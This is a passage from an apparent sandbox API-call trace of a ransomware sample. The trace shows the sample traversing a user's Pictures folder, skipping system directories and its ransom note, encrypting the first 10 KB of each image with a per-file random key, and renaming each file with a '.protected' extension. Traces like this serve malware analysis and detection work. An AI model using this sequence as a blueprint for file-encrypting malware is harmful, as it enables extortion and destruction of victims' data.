halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".txt") returned 0x0 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".rar") returned 0x0 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".zip") returned 0x0 [0092.394] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.395] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.395] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.395] CloseHandle (hObject=0xb4) returned 1 [0092.396] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif.protected") returned 75 [0092.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif.protected")) returned 1 [0092.396] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.396] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.396] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.396] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.396] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.397] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.397] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.397] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.398] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.398] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.398] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.398] CloseHandle (hObject=0xb4) returned 1 [0092.398] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.protected") returned 64 [0092.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.protected")) returned 1 [0092.398] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.398] lstrcmpiW (lpString1="e8PF.gif", lpString2="Windows") returned -1 [0092.398] lstrcmpiW (lpString1="e8PF.gif", lpString2="Program Files") returned -1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="Program Files (x86)") returned -1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="$Recycle.bin") returned 1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="System Volume Information") returned -1 [0092.399] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrIW (lpFirst="e8PF.gif", lpSrch=".protected") returned 0x0 [0092.399] lstrcmpW (lpString1="e8PF.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.399] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\pictures\\e8pf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".txt") returned 0x0 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".rar") returned 0x0 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".zip") returned 0x0 [0092.399] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.400] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.400] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.400] CloseHandle (hObject=0xb4) returned 1 
[0092.400] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif.protected") returned 61 [0092.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e8pf.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e8pf.gif.protected")) returned 1 [0092.401] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Windows") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Program Files") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Program Files (x86)") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="$Recycle.bin") returned 1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="System Volume Information") returned -1 [0092.401] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.401] StrStrIW (lpFirst="eYNE3D.jpg", lpSrch=".protected") returned 0x0 [0092.401] lstrcmpW (lpString1="eYNE3D.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.401] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".txt") returned 0x0 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".rar") returned 0x0 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".zip") returned 0x0 [0092.402] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.403] CloseHandle (hObject=0xb4) returned 1 [0092.403] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg.protected") returned 63 [0092.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg.protected")) returned 1 [0092.404] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Program Files (x86)") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="System Volume Information") returned -1 [0092.404] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E") returned 62 [0092.404] lstrcmpW (lpString1="GgHVBzlKK6crvWZop5E", lpString2=".") returned 1 [0092.404] lstrcmpW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="..") returned 1 [0092.404] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\*") returned 64 [0092.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.404] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.404] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.404] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\.") returned 64 [0092.404] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.404] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\..") returned 65 [0092.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.405] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Windows") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Program Files") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Program Files (x86)") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="$Recycle.bin") returned 1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="System Volume Information") returned -1 [0092.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrIW 
(lpFirst="GNxOOw1.bmp", lpSrch=".protected") returned 0x0 [0092.405] lstrcmpW (lpString1="GNxOOw1.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".txt") returned 0x0 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".rar") returned 0x0 [0092.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.406] StrStrW (lpFirst="GNxOOw1.bmp", lpSrch=".zip") returned 0x0 [0092.406] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.406] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.407] CloseHandle (hObject=0xd4) returned 1 [0092.407] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp.protected") returned 84 [0092.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\gnxoow1.bmp.protected")) returned 1 [0092.408] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Windows") returned -1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Program Files") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="Program Files (x86)") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="$Recycle.bin") returned 1 [0092.408] lstrcmpiW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="System Volume Information") returned 1 [0092.408] wnsprintfW 
(in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrIW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".protected") returned 0x0 [0092.408] lstrcmpW (lpString1="t8oqS4WPdm0-igy_9.png", lpString2="RESTORE_FILES.txt") returned 1 [0092.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghvbzlkk6crvwzop5e\\t8oqs4wpdm0-igy_9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".txt") returned 0x0 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".rar") returned 0x0 [0092.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\t8oqS4WPdm0-igy_9.png") returned 84 [0092.408] StrStrW (lpFirst="t8oqS4WPdm0-igy_9.png", lpSrch=".zip") returned 0x0 [0092.409] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.409] 